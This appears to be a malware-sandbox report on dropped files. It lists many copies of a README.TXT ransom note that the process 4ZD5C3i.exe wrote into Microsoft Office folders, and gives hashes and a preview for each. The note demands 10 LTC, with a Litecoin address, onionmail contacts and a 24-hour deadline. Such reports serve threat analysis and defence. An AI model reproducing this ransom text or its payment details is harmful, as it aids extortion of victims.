                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000123\assets\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000125\assets\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000128\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000131\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000132\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000137\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000138\OfflineFiles\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000139\_ms_office_sdx_start_common\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000139\_ms_office_sdx_start_word_ui\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000139\_office_iss_canvas_contextual\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000140\_ms_office_sdx_start_common\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000140\_ms_office_sdx_start_xl_ui\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000140\_office_iss_canvas_contextual\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000141\_ms_office_sdx_start_common\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000141\_ms_office_sdx_start_ppt_ui\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
